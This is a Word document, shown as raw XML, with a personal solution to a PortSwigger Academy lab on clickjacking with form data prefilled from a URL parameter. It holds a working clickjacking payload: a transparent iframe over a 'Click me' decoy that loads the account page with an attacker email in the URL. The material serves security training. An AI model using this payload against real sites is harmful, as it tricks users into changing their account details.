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28BA" w14:textId="77777777" w:rsidR="004D31F5" w:rsidRPr="004D31F5" w:rsidRDefault="004D31F5" w:rsidP="004D31F5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D31F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lab: Clickjacking with form input data prefilled from a URL parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12015F7C" w14:textId="77777777" w:rsidR="004D31F5" w:rsidRPr="004D31F5" w:rsidRDefault="004D31F5" w:rsidP="004D31F5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59B8E466" w14:textId="77777777" w:rsidR="004D31F5" w:rsidRPr="004D31F5" w:rsidRDefault="004D31F5" w:rsidP="004D31F5">
      <w:r w:rsidRPr="004D31F5">
        <w:t>This lab extends the basic </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="004D31F5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>clickjacking example</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="004D31F5">
        <w:t> in </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="004D31F5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Lab: Basic clickjacking with CSRF token protection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="004D31F5">
        <w:t>. The goal of the lab is to change the email address of the user by prepopulating a form using a URL parameter and enticing the user to inadvertently click on an "Update email" button.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251EFA6B" w14:textId="77777777" w:rsidR="004D31F5" w:rsidRPr="004D31F5" w:rsidRDefault="004D31F5" w:rsidP="004D31F5">
      <w:r w:rsidRPr="004D31F5">
        <w:t>To solve the lab, craft some HTML that frames the account page and fools the user into updating their email address by clicking on a "Click me" decoy. The lab is solved when the email address is changed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30799AC9" w14:textId="77777777" w:rsidR="004D31F5" w:rsidRDefault="004D31F5" w:rsidP="004D31F5">
      <w:r w:rsidRPr="004D31F5">
        <w:t>You can log in to your own account using the following credentials: wiener:peter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115A4D85" w14:textId="77777777" w:rsidR="003B49DB" w:rsidRDefault="003B49DB" w:rsidP="004D31F5"/>
    <w:p w14:paraId="0112C6CD" w14:textId="77777777" w:rsidR="003B49DB" w:rsidRDefault="003B49DB" w:rsidP="003B49DB">
      <w:r>
        <w:t>&lt;style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486164BD" w14:textId="77777777" w:rsidR="003B49DB" w:rsidRDefault="003B49DB" w:rsidP="003B49DB">
      <w:r>
        <w:t xml:space="preserve">    iframe {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B627E53" w14:textId="77777777" w:rsidR="003B49DB" w:rsidRDefault="003B49DB" w:rsidP="003B49DB">
      <w:r>
        <w:t xml:space="preserve">        position:relative;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C952F62" w14:textId="77777777" w:rsidR="003B49DB" w:rsidRDefault="003B49DB" w:rsidP="003B49DB">
      <w:r>
        <w:t xml:space="preserve">        width:500px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3247BEC2" w14:textId="77777777" w:rsidR="003B49DB" w:rsidRDefault="003B49DB" w:rsidP="003B49DB">
      <w:r>
        <w:t xml:space="preserve">        height:700px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056DF192" w14:textId="77777777" w:rsidR="003B49DB" w:rsidRDefault="003B49DB" w:rsidP="003B49DB">
      <w:r>
        <w:t xml:space="preserve">        opacity:0.2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D92064" w14:textId="77777777" w:rsidR="003B49DB" w:rsidRDefault="003B49DB" w:rsidP="003B49DB">
      <w:r>
        <w:t xml:space="preserve">        z-index:2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BC7890" w14:textId="77777777" w:rsidR="003B49DB" w:rsidRDefault="003B49DB" w:rsidP="003B49DB">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6A1D28" w14:textId="77777777" w:rsidR="003B49DB" w:rsidRDefault="003B49DB" w:rsidP="003B49DB">
      <w:r>
        <w:t xml:space="preserve">    #decoy {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13ED5024" w14:textId="77777777" w:rsidR="003B49DB" w:rsidRDefault="003B49DB" w:rsidP="003B49DB">
      <w:r>
        <w:t xml:space="preserve">        position:absolute;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122828EE" w14:textId="77777777" w:rsidR="003B49DB" w:rsidRDefault="003B49DB" w:rsidP="003B49DB">
      <w:r>
        <w:t xml:space="preserve">        top:440px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B7009D" w14:textId="77777777" w:rsidR="003B49DB" w:rsidRDefault="003B49DB" w:rsidP="003B49DB">
      <w:r>
        <w:t xml:space="preserve">        left:80px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9F4BD1" w14:textId="77777777" w:rsidR="003B49DB" w:rsidRDefault="003B49DB" w:rsidP="003B49DB">
      <w:r>
        <w:t xml:space="preserve">        z-index:1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362C8763" w14:textId="77777777" w:rsidR="003B49DB" w:rsidRDefault="003B49DB" w:rsidP="003B49DB">
      <w:r>
        <w:t xml:space="preserve">        background-color: #f0c040;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6552C18C" w14:textId="77777777" w:rsidR="003B49DB" w:rsidRDefault="003B49DB" w:rsidP="003B49DB">
      <w:r>
        <w:t xml:space="preserve">        padding: 10px 20px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D7F6DF" w14:textId="77777777" w:rsidR="003B49DB" w:rsidRDefault="003B49DB" w:rsidP="003B49DB">
      <w:r>
        <w:t xml:space="preserve">        font-size: 20px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222688C7" w14:textId="77777777" w:rsidR="003B49DB" w:rsidRDefault="003B49DB" w:rsidP="003B49DB">
      <w:r>
        <w:t xml:space="preserve">        color: white;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5A03E0" w14:textId="77777777" w:rsidR="003B49DB" w:rsidRDefault="003B49DB" w:rsidP="003B49DB">
      <w:r>
        <w:t xml:space="preserve">        border: none;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07536A17" w14:textId="77777777" w:rsidR="003B49DB" w:rsidRDefault="003B49DB" w:rsidP="003B49DB">
      <w:r>
        <w:t xml:space="preserve">        cursor: pointer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2619B34C" w14:textId="77777777" w:rsidR="003B49DB" w:rsidRDefault="003B49DB" w:rsidP="003B49DB">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43003444" w14:textId="77777777" w:rsidR="003B49DB" w:rsidRDefault="003B49DB" w:rsidP="003B49DB">
      <w:r>
        <w:t>&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E1DD61" w14:textId="77777777" w:rsidR="003B49DB" w:rsidRDefault="003B49DB" w:rsidP="003B49DB">
      <w:r>
        <w:t>&lt;button id="decoy"&gt;Click me&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D62FBA2" w14:textId="68F6D9C8" w:rsidR="003B49DB" w:rsidRPr="004D31F5" w:rsidRDefault="003B49DB" w:rsidP="003B49DB">
      <w:r>
        <w:t>&lt;iframe src="https://0a980065042ca1e7811bc16f007d0036.web-security-academy.net/my-account?email=hacker3@attacker-website.com"&gt;&lt;/iframe&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4433E889" w14:textId="77777777" w:rsidR="004D31F5" w:rsidRPr="004D31F5" w:rsidRDefault="004D31F5" w:rsidP="004D31F5"/>
    <w:p w14:paraId="25C41EBD" w14:textId="16E4179B" w:rsidR="00235C41" w:rsidRDefault="003B49DB">
      <w:r w:rsidRPr="003B49DB">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="476A4DF4" wp14:editId="543D6FC4">
            <wp:extent cx="5537200" cy="520700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="188771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12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E35CE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BAF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00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5"/>
    <w:rsid w:val="00235C41"/>
    <w:rsid w:val="003B49DB"/>
    <w:rsid w:val="004D31F5"/>
    <w:rsid w:val="0063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EF2FB9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{EFE615FA-0C3E-EB45-8EA0-FC1FA7CD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1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1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1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1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1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1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1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1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7524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3536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8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975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1225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2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clickjacking/lab-basic-csrf-protected" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/clickjac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Arias Medina</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Andres Felipe Arias Medina</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-08-20T04:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-20T04:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>